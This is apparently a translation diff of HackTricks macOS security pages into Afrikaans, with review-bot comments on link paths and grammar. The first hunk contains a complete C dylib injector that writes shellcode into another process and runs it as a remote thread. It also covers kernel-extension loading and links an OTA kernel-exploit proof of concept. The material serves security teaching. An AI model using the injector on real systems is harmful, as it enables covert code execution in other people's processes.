- // - extern void *_pthread_set_self; - possiblePatchLocation++; - - - uint64_t addrOfPthreadCreate = dlsym ( RTLD_DEFAULT, "pthread_create_from_mach_thread"); //(uint64_t) pthread_create_from_mach_thread; - uint64_t addrOfPthreadExit = dlsym (RTLD_DEFAULT, "pthread_exit"); //(uint64_t) pthread_exit; - uint64_t addrOfDlopen = (uint64_t) dlopen; - - if (memcmp (possiblePatchLocation, "PTHRDEXT", 8) == 0) - { - memcpy(possiblePatchLocation, &addrOfPthreadExit,8); - printf ("Pthread exit @%llx, %llx\n", addrOfPthreadExit, pthread_exit); - } - - if (memcmp (possiblePatchLocation, "PTHRDCRT", 8) == 0) - { - memcpy(possiblePatchLocation, &addrOfPthreadCreate,8); - printf ("Pthread create from mach thread @%llx\n", addrOfPthreadCreate); - } - - if (memcmp(possiblePatchLocation, "DLOPEN__", 6) == 0) - { - printf ("DLOpen @%llx\n", addrOfDlopen); - memcpy(possiblePatchLocation, &addrOfDlopen, sizeof(uint64_t)); - } - - if (memcmp(possiblePatchLocation, "LIBLIBLIB", 9) == 0) - { - strcpy(possiblePatchLocation, lib ); - } - } - - // Write the shellcode to the allocated memory - kr = mach_vm_write(remoteTask, // Task port - remoteCode64, // Virtual Address (Destination) - (vm_address_t) injectedCode, // Source - 0xa9); // Length of the source +if (kr != KERN_SUCCESS) +{ +fprintf(stderr,"Unable to allocate memory for remote code in thread: Error %s\n", mach_error_string(kr)); +return (-2); +} - if (kr != KERN_SUCCESS) - { - fprintf(stderr,"Unable to write remote thread memory: Error %s\n", mach_error_string(kr)); - return (-3); - } +// Patch shellcode + +int i = 0; +char *possiblePatchLocation = (injectedCode ); +for (i = 0 ; i < 0x100; i++) +{ + +// Patching is crude, but works. 
+// +extern void *_pthread_set_self; +possiblePatchLocation++; - // Set the permissions on the allocated code memory - kr = vm_protect(remoteTask, remoteCode64, 0x70, FALSE, VM_PROT_READ | VM_PROT_EXECUTE); +uint64_t addrOfPthreadCreate = dlsym ( RTLD_DEFAULT, "pthread_create_from_mach_thread"); //(uint64_t) pthread_create_from_mach_thread; +uint64_t addrOfPthreadExit = dlsym (RTLD_DEFAULT, "pthread_exit"); //(uint64_t) pthread_exit; +uint64_t addrOfDlopen = (uint64_t) dlopen; - if (kr != KERN_SUCCESS) - { - fprintf(stderr,"Unable to set memory permissions for remote thread's code: Error %s\n", mach_error_string(kr)); - return (-4); - } +if (memcmp (possiblePatchLocation, "PTHRDEXT", 8) == 0) +{ +memcpy(possiblePatchLocation, &addrOfPthreadExit,8); +printf ("Pthread exit @%llx, %llx\n", addrOfPthreadExit, pthread_exit); +} - // Set the permissions on the allocated stack memory - kr = vm_protect(remoteTask, remoteStack64, STACK_SIZE, TRUE, VM_PROT_READ | VM_PROT_WRITE); - - if (kr != KERN_SUCCESS) - { - fprintf(stderr,"Unable to set memory permissions for remote thread's stack: Error %s\n", mach_error_string(kr)); - return (-4); - } +if (memcmp (possiblePatchLocation, "PTHRDCRT", 8) == 0) +{ +memcpy(possiblePatchLocation, &addrOfPthreadCreate,8); +printf ("Pthread create from mach thread @%llx\n", addrOfPthreadCreate); +} + +if (memcmp(possiblePatchLocation, "DLOPEN__", 6) == 0) +{ +printf ("DLOpen @%llx\n", addrOfDlopen); +memcpy(possiblePatchLocation, &addrOfDlopen, sizeof(uint64_t)); +} + +if (memcmp(possiblePatchLocation, "LIBLIBLIB", 9) == 0) +{ +strcpy(possiblePatchLocation, lib ); +} +} + +// Write the shellcode to the allocated memory +kr = mach_vm_write(remoteTask, // Task port +remoteCode64, // Virtual Address (Destination) +(vm_address_t) injectedCode, // Source +0xa9); // Length of the source - // Create thread to run shellcode - struct arm_unified_thread_state remoteThreadState64; - thread_act_t remoteThread; +if (kr != KERN_SUCCESS) +{ 
+fprintf(stderr,"Unable to write remote thread memory: Error %s\n", mach_error_string(kr)); +return (-3); +} - memset(&remoteThreadState64, '\0', sizeof(remoteThreadState64) ); - remoteStack64 += (STACK_SIZE / 2); // this is the real stack - //remoteStack64 -= 8; // need alignment of 16 +// Set the permissions on the allocated code memory +```c +kr = vm_protect(remoteTask, remoteCode64, 0x70, FALSE, VM_PROT_READ | VM_PROT_EXECUTE); - const char* p = (const char*) remoteCode64; +if (kr != KERN_SUCCESS) +{ +fprintf(stderr,"Kan nie geheue toestemmings instel vir kode van afstandige draad nie: Fout %s\n", mach_error_string(kr)); +return (-4); +} - remoteThreadState64.ash.flavor = ARM_THREAD_STATE64; - remoteThreadState64.ash.count = ARM_THREAD_STATE64_COUNT; - remoteThreadState64.ts_64.__pc = (u_int64_t) remoteCode64; - remoteThreadState64.ts_64.__sp = (u_int64_t) remoteStack64; +// Stel die toestemmings op die toegewysde stapelgeheue +kr = vm_protect(remoteTask, remoteStack64, STACK_SIZE, TRUE, VM_PROT_READ | VM_PROT_WRITE); - printf ("Remote Stack 64 0x%llx, Remote code is %p\n", remoteStack64, p ); +if (kr != KERN_SUCCESS) +{ +fprintf(stderr,"Kan nie geheue toestemmings instel vir stapel van afstandige draad nie: Fout %s\n", mach_error_string(kr)); +return (-4); +} - kr = thread_create_running(remoteTask, ARM_THREAD_STATE64, // ARM_THREAD_STATE64, - (thread_state_t) &remoteThreadState64.ts_64, ARM_THREAD_STATE64_COUNT , &remoteThread ); - if (kr != KERN_SUCCESS) { - fprintf(stderr,"Unable to create remote thread: error %s", mach_error_string (kr)); - return (-3); - } +// Skep draad om skelkode uit te voer +struct arm_unified_thread_state remoteThreadState64; +thread_act_t remoteThread; - return (0); +memset(&remoteThreadState64, '\0', sizeof(remoteThreadState64) ); + +remoteStack64 += (STACK_SIZE / 2); // dit is die werklike stapel +//remoteStack64 -= 8; // nodig uitlyning van 16 + +const char* p = (const char*) remoteCode64; + +remoteThreadState64.ash.flavor = 
ARM_THREAD_STATE64; +remoteThreadState64.ash.count = ARM_THREAD_STATE64_COUNT; +remoteThreadState64.ts_64.__pc = (u_int64_t) remoteCode64; +remoteThreadState64.ts_64.__sp = (u_int64_t) remoteStack64; + +printf ("Afstandige Stapel 64 0x%llx, Afstandige kode is %p\n", remoteStack64, p ); + +kr = thread_create_running(remoteTask, ARM_THREAD_STATE64, // ARM_THREAD_STATE64, +(thread_state_t) &remoteThreadState64.ts_64, ARM_THREAD_STATE64_COUNT , &remoteThread ); + +if (kr != KERN_SUCCESS) { +fprintf(stderr,"Kan nie afstandige draad skep nie: Fout %s", mach_error_string (kr)); +return (-3); +} + +return (0); } int main(int argc, const char * argv[]) { - if (argc < 3) - { - fprintf (stderr, "Usage: %s _pid_ _action_\n", argv[0]); - fprintf (stderr, " _action_: path to a dylib on disk\n"); - exit(0); - } +if (argc < 3) +{ +fprintf (stderr, "Gebruik: %s _pid_ _aksie_\n", argv[0]); +fprintf (stderr, " _aksie_: pad na 'n dylib op skyf\n"); +exit(0); +} - pid_t pid = atoi(argv[1]); - const char *action = argv[2]; - struct stat buf; +pid_t pid = atoi(argv[1]); +const char *action = argv[2]; +struct stat buf; - int rc = stat (action, &buf); - if (rc == 0) inject(pid,action); - else - { - fprintf(stderr,"Dylib not found\n"); - } +int rc = stat (action, &buf); +if (rc == 0) inject(pid,action); +else +{ +fprintf(stderr,"Dylib nie gevind nie\n"); +} } ``` - - -
- ```bash gcc -framework Foundation -framework Appkit dylib_injector.m -o dylib_injector ./inject ``` +### Draadkaping via Taakpoort -### Thread Hijacking via Task port +In hierdie tegniek word 'n draad van die proses gekaap: -In this technique a thread of the process is hijacked: - -{% content-ref url="../../macos-proces-abuse/macos-ipc-inter-process-communication/macos-thread-injection-via-task-port.md" %} -[macos-thread-injection-via-task-port.md](../../macos-proces-abuse/macos-ipc-inter-process-communication/macos-thread-injection-via-task-port.md) +{% content-ref url="../../macos-proces-misbruik/macos-ipc-inter-process-communication/macos-draadinspuiting-via-taakpoort.md" %} +[macos-draadinspuiting-via-taakpoort.md](../../macos-proces-misbruik/macos-ipc-inter-process-communication/macos-draadinspuiting-via-taakpoort.md) {% endcontent-ref %} ## XPC -### Basic Information +### Basiese Inligting -XPC, which stands for XNU (the kernel used by macOS) inter-Process Communication, is a framework for **communication between processes** on macOS and iOS. XPC provides a mechanism for making **safe, asynchronous method calls between different processes** on the system. It's a part of Apple's security paradigm, allowing for the **creation of privilege-separated applications** where each **component** runs with **only the permissions it needs** to do its job, thereby limiting the potential damage from a compromised process. +XPC, wat staan vir XNU (die kernel wat deur macOS gebruik word) interproseskommunikasie, is 'n raamwerk vir **kommunikasie tussen prosesse** op macOS en iOS. XPC bied 'n meganisme vir die maak van **veilige, asynchrone metode-oproepe tussen verskillende prosesse** op die stelsel. 
Dit is 'n deel van Apple se veiligheidsparadigma wat die **skepping van voorreg-geskeide toepassings** moontlik maak waar elke **komponent** met **slegs die toestemmings wat dit nodig het** om sy werk te doen, loop, en sodoende die potensiële skade van 'n gekompromitteerde proses beperk. -For more information about how this **communication work** on how it **could be vulnerable** check: +Vir meer inligting oor hoe hierdie **kommunikasie werk** en hoe dit **kwesbaar kan wees**, kyk na: -{% content-ref url="../../macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/" %} -[macos-xpc](../../macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/) +{% content-ref url="../../macos-proces-misbruik/macos-ipc-inter-process-communication/macos-xpc/" %} +[macos-xpc](../../macos-proces-misbruik/macos-ipc-inter-process-communication/macos-xpc/) {% endcontent-ref %} ## MIG - Mach Interface Generator -MIG was created to **simplify the process of Mach IPC** code creation. It basically **generates the needed code** for server and client to communicate with a given definition. Even if the generated code is ugly, a developer will just need to import it and his code will be much simpler than before. +MIG is geskep om die proses van Mach IPC-kode-skepping te **vereenvoudig**. Dit genereer basies die benodigde kode vir die bediener en kliënt om met 'n gegewe definisie te kommunikeer. Selfs al is die gegenereerde kode lelik, 'n ontwikkelaar hoef dit net in te voer en sy kode sal baie eenvoudiger wees as voorheen. 
-For more info check: +Vir meer inligting, kyk na: -{% content-ref url="../../macos-proces-abuse/macos-ipc-inter-process-communication/macos-mig-mach-interface-generator.md" %} -[macos-mig-mach-interface-generator.md](../../macos-proces-abuse/macos-ipc-inter-process-communication/macos-mig-mach-interface-generator.md) +{% content-ref url="../../macos-proces-misbruik/macos-ipc-inter-process-communication/macos-mig-mach-interface-generator.md" %} +[macos-mig-mach-interface-generator.md](../../macos-proces-misbruik/macos-ipc-inter-process-communication/macos-mig-mach-interface-generator.md) {% endcontent-ref %} -## References +## Verwysings * [https://docs.darlinghq.org/internals/macos-specifics/mach-ports.html](https://docs.darlinghq.org/internals/macos-specifics/mach-ports.html) * [https://knight.sc/malware/2019/03/15/code-injection-on-macos.html](https://knight.sc/malware/2019/03/15/code-injection-on-macos.html) @@ -854,14 +882,14 @@ For more info check:
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks-uitrusting**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
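Review bot: the `content-ref` link targets in the Thread Hijacking, XPC and MIG hunks are translated along with the prose, which will break the links unless the target files were renamed: `../../macos-proces-misbruik/macos-ipc-inter-process-communication/macos-draadinspuiting-via-taakpoort.md` and `../../macos-proces-misbruik/macos-ipc-inter-process-communication/macos-xpc/` replace the existing `macos-proces-abuse/...` paths, while every `diff --git` header visible in this patch shows files modified in place under their English names. Keep the original relative path inside `{% content-ref url=... %}` and in the link target, and translate only the visible link text if anything. Smaller style point in the MIG paragraph: "Selfs al is die gegenereerde kode lelik, 'n ontwikkelaar hoef dit net in te voer" needs verb-second order after the subordinate clause, i.e. "hoef 'n ontwikkelaar dit net in te voer".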
diff --git a/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-kernel-extensions.md b/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-kernel-extensions.md index 9ae704aaa..e17f07d3f 100644 --- a/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-kernel-extensions.md +++ b/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-kernel-extensions.md @@ -1,62 +1,62 @@ -# macOS Kernel Extensions +# macOS Kerneluitbreidings
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -* ¿Trabajas en una **empresa de ciberseguridad**? ¿Quieres ver tu **empresa anunciada en HackTricks**? ¿O quieres tener acceso a la **última versión de PEASS o descargar HackTricks en PDF**? ¡Consulta los [**PLANES DE SUSCRIPCIÓN**](https://github.com/sponsors/carlospolop)! -* Descubre [**The PEASS Family**](https://opensea.io/collection/the-peass-family), nuestra colección exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family) -* Obtén el [**swag oficial de PEASS y HackTricks**](https://peass.creator-spring.com) -* **Únete al** [**💬**](https://emojipedia.org/speech-balloon/) **grupo de Discord** o al [**grupo de telegram**](https://t.me/peass) o **sígueme** en **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks\_live). -* **Comparte tus trucos de hacking enviando PR a** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **y** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud). +* Werk jy vir 'n **cybersecurity-maatskappy**? Wil jy jou **maatskappy adverteer op HackTricks**? Of wil jy toegang hê tot die **laaste weergawe van PEASS of HackTricks aflaai in PDF-formaat**? Kyk na die [**SUBSKRIPSIEPLANNE**](https://github.com/sponsors/carlospolop)! +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons eksklusiewe versameling van [**NFT's**](https://opensea.io/collection/the-peass-family) +* Kry die [**amptelike PEASS- en HackTricks-uitrusting**](https://peass.creator-spring.com) +* **Sluit aan by die** [**💬**](https://emojipedia.org/speech-balloon/) **Discord-groep** of die [**telegram-groep**](https://t.me/peass) of **volg my** op **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks\_live). 
+* **Deel jou hacking-truuks deur 'n PR te stuur na** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **en** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
-## Basic Information +## Basiese Inligting -Kernel extensions (Kexts) are **packages** with a **`.kext`** extension that are **loaded directly into the macOS kernel space**, providing additional functionality to the main operating system. +Kerneluitbreidings (Kexts) is **pakette** met 'n **`.kext`**-uitbreiding wat **direk in die macOS-kernelruimte gelaai** word en addisionele funksionaliteit aan die hoof-bedryfstelsel bied. -### Requirements +### Vereistes -Obviously, this is so powerful that it is **complicated to load a kernel extension**. These are the **requirements** that a kernel extension must meet to be loaded: +Dit is vanselfsprekend dat dit so kragtig is dat dit **moeilik is om 'n kerneluitbreiding te laai**. Hier is die **vereistes** wat 'n kerneluitbreiding moet nakom om gelaai te word: -* When **entering recovery mode**, kernel **extensions must be allowed** to be loaded: +* Wanneer jy **herstelmodus betree**, moet kernel-uitbreidings toegelaat word om gelaai te word:
-* The kernel extension must be **signed with a kernel code signing certificate**, which can only be **granted by Apple**. Who will review in detail the company and the reasons why it is needed. -* The kernel extension must also be **notarized**, Apple will be able to check it for malware. -* Then, the **root** user is the one who can **load the kernel extension** and the files inside the package must **belong to root**. -* During the upload process, the package must be prepared in a **protected non-root location**: `/Library/StagedExtensions` (requires the `com.apple.rootless.storage.KernelExtensionManagement` grant). -* Finally, when attempting to load it, the user will [**receive a confirmation request**](https://developer.apple.com/library/archive/technotes/tn2459/\_index.html) and, if accepted, the computer must be **restarted** to load it. +* Die kerneluitbreiding moet **onderteken wees met 'n kernel-kodesertifikaat**, wat slegs deur Apple **toegeken** kan word. Apple sal in detail die maatskappy en die redes waarom dit nodig is, ondersoek. +* Die kerneluitbreiding moet ook **genotariseer** word, sodat Apple dit vir malware kan ondersoek. +* Die **root**-gebruiker is die een wat die kerneluitbreiding kan laai en die lêers binne die pakkie moet aan **root** behoort. +* Tydens die oplaai-proses moet die pakkie voorberei word in 'n **beskermde nie-root-plek**: `/Library/StagedExtensions` (vereis die `com.apple.rootless.storage.KernelExtensionManagement` toekenning). +* Laastens, wanneer jy probeer om dit te laai, sal die gebruiker 'n [**bevestigingsversoek ontvang**](https://developer.apple.com/library/archive/technotes/tn2459/\_index.html) en, indien aanvaar, moet die rekenaar **herlaai** word om dit te laai. -### Loading process +### Laaiproses -In Catalina it was like this: It is interesting to note that the **verification** process occurs in **userland**. 
However, only applications with the **`com.apple.private.security.kext-management`** grant can **request the kernel to load an extension**: `kextcache`, `kextload`, `kextutil`, `kextd`, `syspolicyd` +In Catalina was dit so: Dit is interessant om op te merk dat die **verifikasieproses** in **userland** plaasvind. Slegs programme met die **`com.apple.private.security.kext-management`**-toekenning kan egter die kernel versoek om 'n uitbreiding te laai: `kextcache`, `kextload`, `kextutil`, `kextd`, `syspolicyd` -1. **`kextutil`** cli **starts** the **verification** process for loading an extension - * It will talk to **`kextd`** by sending using a **Mach service**. -2. **`kextd`** will check several things, such as the **signature** - * It will talk to **`syspolicyd`** to **check** if the extension can be **loaded**. -3. **`syspolicyd`** will **prompt** the **user** if the extension has not been previously loaded. - * **`syspolicyd`** will report the result to **`kextd`** -4. **`kextd`** will finally be able to **tell the kernel to load** the extension +1. **`kextutil`**-opdraglyn **begin** die **verifikasieproses** vir die laai van 'n uitbreiding +* Dit sal met **`kextd`** praat deur gebruik te maak van 'n **Mach-diens**. +2. **`kextd`** sal verskeie dinge nagaan, soos die **handtekening** +* Dit sal met **`syspolicyd`** praat om te **kontroleer** of die uitbreiding gelaai kan word. +3. **`syspolicyd`** sal die **gebruiker versoek** as die uitbreiding nie voorheen gelaai is nie. +* **`syspolicyd`** sal die resultaat aan **`kextd`** rapporteer +4. **`kextd`** sal uiteindelik die kernel kan **instrueer om die uitbreiding te laai** -If **`kextd`** is not available, **`kextutil`** can perform the same checks. +As **`kextd`** nie beskikbaar is nie, kan **`kextutil`** dieselfde kontroles uitvoer. 
-## Referencias +## Verwysings * [https://www.makeuseof.com/how-to-enable-third-party-kernel-extensions-apple-silicon-mac/](https://www.makeuseof.com/how-to-enable-third-party-kernel-extensions-apple-silicon-mac/) * [https://www.youtube.com/watch?v=hGKOskSiaQo](https://www.youtube.com/watch?v=hGKOskSiaQo)
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -* ¿Trabajas en una **empresa de ciberseguridad**? ¿Quieres ver tu **empresa anunciada en HackTricks**? ¿O quieres tener acceso a la **última versión de PEASS o descargar HackTricks en PDF**? ¡Consulta los [**PLANES DE SUSCRIPCIÓN**](https://github.com/sponsors/carlospolop)! -* Descubre [**The PEASS Family**](https://opensea.io/collection/the-peass-family), nuestra colección exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family) -* Obtén el [**swag oficial de PEASS y HackTricks**](https://peass.creator-spring.com) -* **Únete al** [**💬**](https://emojipedia.org/speech-balloon/) **grupo de Discord** o al [**grupo de telegram**](https://t.me/peass) o **sígueme** en **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks\_live). -* **Comparte tus trucos de hacking enviando PR a** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **y** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud). +* Werk jy vir 'n **cybersecurity-maatskappy**? Wil jy jou **maatskappy adverteer op HackTricks**? Of wil jy toegang hê tot die **laaste weergawe van PEASS of HackTricks aflaai in PDF-formaat**? Kyk na die [**SUBSKRIPSIEPLANNE**](https://github.com/sponsors/carlospolop)! +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons eksklusiewe versameling van [**NFT's**](https://opensea.io/collection/the-peass-family) +* Kry die [**amptelike PEASS- en HackTricks-uitrusting**](https://peass.creator-spring.com) +* **Sluit aan by die** [**💬**](https://emojipedia.org/speech-balloon/) **Discord-groep** of die [**telegram-groep**](https://t.me/peass) of **volg my** op **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks\_live). 
+* **Deel jou hacking-truuks deur 'n PR te stuur na** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **en** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
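Review bot: the sub-points of the Catalina loading-process list lose their nesting in the translated version: the removed lines keep the bullet indented under the numbered step (`- * It will talk to **`kextd`** by sending using a **Mach service**.`) whereas the added lines start the bullet at column 0 (`+* Dit sal met **`kextd`** praat deur gebruik te maak van 'n **Mach-diens**.`), so the four sub-bullets no longer render under steps 1 to 3 and the numbered list is split. Restore the leading whitespace on those four `* ...` lines. Also, "Dit is vanselfsprekend dat dit so kragtig is dat dit moeilik is om 'n kerneluitbreiding te laai" reads awkwardly for "Obviously, this is so powerful that it is complicated to load a kernel extension"; "Dit is natuurlik so kragtig dat dit moeilik is om 'n kerneluitbreiding te laai" keeps the meaning with less nesting.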
diff --git a/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-kernel-vulnerabilities.md b/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-kernel-vulnerabilities.md index ae83bd63a..3fb22428c 100644 --- a/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-kernel-vulnerabilities.md +++ b/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-kernel-vulnerabilities.md @@ -1,30 +1,30 @@ -# macOS Kernel Vulnerabilities +# macOS Kernel Kwesbaarhede
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -* ¿Trabajas en una **empresa de ciberseguridad**? ¿Quieres ver tu **empresa anunciada en HackTricks**? ¿O quieres tener acceso a la **última versión de PEASS o descargar HackTricks en PDF**? ¡Consulta los [**PLANES DE SUSCRIPCIÓN**](https://github.com/sponsors/carlospolop)! -* Descubre [**The PEASS Family**](https://opensea.io/collection/the-peass-family), nuestra colección exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family) -* Obtén el [**swag oficial de PEASS y HackTricks**](https://peass.creator-spring.com) -* **Únete al** [**💬**](https://emojipedia.org/speech-balloon/) **grupo de Discord** o al [**grupo de telegram**](https://t.me/peass) o **sígueme** en **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks\_live). -* **Comparte tus trucos de hacking enviando PR a** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **y** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud). +* Werk jy vir 'n **cybersecurity-maatskappy**? Wil jy jou **maatskappy adverteer op HackTricks**? Of wil jy toegang hê tot die **laaste weergawe van PEASS of HackTricks aflaai in PDF-formaat**? Kyk na die [**SUBSKRIPSIEPLANNE**](https://github.com/sponsors/carlospolop)! +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons eksklusiewe versameling van [**NFTs**](https://opensea.io/collection/the-peass-family) +* Kry die [**amptelike PEASS en HackTricks swag**](https://peass.creator-spring.com) +* **Sluit aan by die** [**💬**](https://emojipedia.org/speech-balloon/) **Discord-groep** of die [**telegram-groep**](https://t.me/peass) of **volg my** op **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks\_live). 
+* **Deel jou hacking-truuks deur 'n PR te stuur na** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **en** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
## [Pwning OTA](https://jhftss.github.io/The-Nightmare-of-Apple-OTA-Update/) -[**In this report**](https://jhftss.github.io/The-Nightmare-of-Apple-OTA-Update/) are explained several vulnerabilities that allowed to compromised the kernel compromising the software updater.\ +[**In hierdie verslag**](https://jhftss.github.io/The-Nightmare-of-Apple-OTA-Update/) word verskeie kwesbaarhede verduidelik wat dit moontlik gemaak het om die kernel te kompromitteer deur die sagteware-opdatering te kompromitteer.\ [**PoC**](https://github.com/jhftss/POC/tree/main/CVE-2022-46722).
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -* ¿Trabajas en una **empresa de ciberseguridad**? ¿Quieres ver tu **empresa anunciada en HackTricks**? ¿O quieres tener acceso a la **última versión de PEASS o descargar HackTricks en PDF**? ¡Consulta los [**PLANES DE SUSCRIPCIÓN**](https://github.com/sponsors/carlospolop)! -* Descubre [**The PEASS Family**](https://opensea.io/collection/the-peass-family), nuestra colección exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family) -* Obtén el [**swag oficial de PEASS y HackTricks**](https://peass.creator-spring.com) -* **Únete al** [**💬**](https://emojipedia.org/speech-balloon/) **grupo de Discord** o al [**grupo de telegram**](https://t.me/peass) o **sígueme** en **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks\_live). -* **Comparte tus trucos de hacking enviando PR a** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **y** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud). +* Werk jy vir 'n **cybersecurity-maatskappy**? Wil jy jou **maatskappy adverteer op HackTricks**? Of wil jy toegang hê tot die **laaste weergawe van PEASS of HackTricks aflaai in PDF-formaat**? Kyk na die [**SUBSKRIPSIEPLANNE**](https://github.com/sponsors/carlospolop)! +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons eksklusiewe versameling van [**NFTs**](https://opensea.io/collection/the-peass-family) +* Kry die [**amptelike PEASS en HackTricks swag**](https://peass.creator-spring.com) +* **Sluit aan by die** [**💬**](https://emojipedia.org/speech-balloon/) **Discord-groep** of die [**telegram-groep**](https://t.me/peass) of **volg my** op **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks\_live). 
+* **Deel jou hacking-truuks deur 'n PR te stuur na** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **en** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
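Review bot: "deur die sagteware-opdatering te kompromitteer" renders "software update" where the original says "compromising the software updater"; the report concerns the updater component itself, so "sagteware-opdateerder" is the accurate term here. The shared banner in this file also diverges from the copy in the kernel-extensions file in the same patch ("NFTs" and "PEASS en HackTricks swag" here versus "NFT's" and "PEASS- en HackTricks-uitrusting" there); pick one rendering for the boilerplate so the translated pages stay consistent.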
diff --git a/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-system-extensions.md b/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-system-extensions.md index da69901e1..a73cdfa1e 100644 --- a/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-system-extensions.md +++ b/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-system-extensions.md @@ -1,107 +1,105 @@ -# macOS System Extensions +# macOS Stelseluitbreidings
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy in HackTricks wil adverteer** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 